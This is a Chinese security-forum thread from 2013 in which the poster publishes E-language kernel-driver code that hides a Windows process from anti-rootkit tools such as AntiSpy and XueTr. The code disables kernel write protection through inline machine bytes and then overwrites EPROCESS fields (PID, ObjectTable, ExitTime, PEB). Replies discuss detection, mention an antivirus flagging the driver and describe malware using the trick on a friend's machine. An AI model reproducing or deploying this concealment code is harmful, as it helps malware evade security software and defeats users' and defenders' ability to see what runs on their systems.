楼主: lpmjknj
收起左侧

[原创文章] 呵呵无聊发个隐藏进程的东西,目前antispy,xuetr等很多ark工具不能检测,发布代码!

  [复制链接]
benlvan
发表于 2013-4-6 08:12:29 | 显示全部楼层
PS:楼主直接把你的驱动文件代码贴出来吧,E文件用notepad根本打不开。
lpmjknj
 楼主| 发表于 2013-4-6 08:29:26 | 显示全部楼层
本帖最后由 lpmjknj 于 2013-4-6 08:31 编辑
benlvan 发表于 2013-4-6 08:12
PS:楼主直接把你的驱动文件代码贴出来吧,E文件用notepad根本打不开。


.版本 2

.子程序 Write_SSDT, , , //写内存
.参数 To, 整数型, , //地址
.参数 From, 整数型, , //写入数据

置入代码 ({ 96, 139, 117, 8, 139, 125, 12, 250, 15, 32, 192, 53, 0, 0, 1, 0, 15, 34, 192, 137, 62, 15, 32, 192, 53, 0, 0, 1, 0, 15, 34, 192, 251, 97, 201, 195 }) // _asm


.版本 2

.如果真 (控制码= 1996)
    .如果真 (PID ≠ 0)
        PsLookupProcessByProcessId (参数.PID, EProcess)
        Write_SSDT (EProcess + 132, -1)//pid
        Write_SSDT (EProcess + 196, 0)//ObjectTable
        Write_SSDT (EProcess + 120, 4)//ExitTime
        Write_SSDT (EProcess + 432, 0)//peb
        Write_SSDT (EProcess, 0)//keprocess

hu3167343
发表于 2013-4-6 08:57:30 | 显示全部楼层
http://bbs.pediy.com/showthread.php?t=151713
其实你这个方法我在差不多一年前就已经发过了,所以AntiSpy本身是不会判断ExitTime的。
至于修改PID啥啥的,下个版本改进下,加个显示可疑进程,呵呵。
hu3167343
发表于 2013-4-6 09:00:04 | 显示全部楼层
大家都很早啊,哈哈。

评分

参与人数 1经验 -3 收起 理由
天原 -3 哎呀 不要多连了

查看全部评分

aiping
头像被屏蔽
发表于 2013-4-6 12:27:42 | 显示全部楼层
楼主qq上很多cf网友,哈哈,楼主喜欢这游戏
shui_shen
发表于 2013-4-9 08:57:02 | 显示全部楼层
神马
yjwfdc
头像被屏蔽
发表于 2013-4-9 09:28:43 | 显示全部楼层
本帖最后由 yjwfdc 于 2013-4-9 09:34 编辑
lpmjknj 发表于 2013-4-5 16:44
额另外附上易语言写驱动教程和例子
http://bbs.eyuyan.com/read.php?tid=208274


多谢楼主 这样的才是技术贴,特别是开源就更是好贴。
3801187
发表于 2013-4-9 13:39:17 | 显示全部楼层
被费尔报毒
小v可
发表于 2013-4-9 13:39:37 | 显示全部楼层
benlvan 发表于 2013-4-5 21:52
我在2010年初写的一个“无驱动玩具ARK”能检测到真实PID:

XT结束不了估计是因为修改了EPROCESS结构的什 ...

求下载地址  大牛~~~
暗夜死灵
发表于 2013-4-10 19:48:28 | 显示全部楼层
hu3167343 发表于 2013-4-6 08:57
http://bbs.pediy.com/showthread.php?t=151713
其实你这个方法我在差不多一年前就已经发过了,所以AntiSp ...

- -。
我朋友的电脑中了这东西。。用Wsyscheck的确能看到。
没多想就结束了,再看时仍然存在,但一重启就没了。
过360……QQ管家....诺顿....AVG.....
病毒利用这东西……危险了。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-17 10:37 , Processed in 0.112796 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表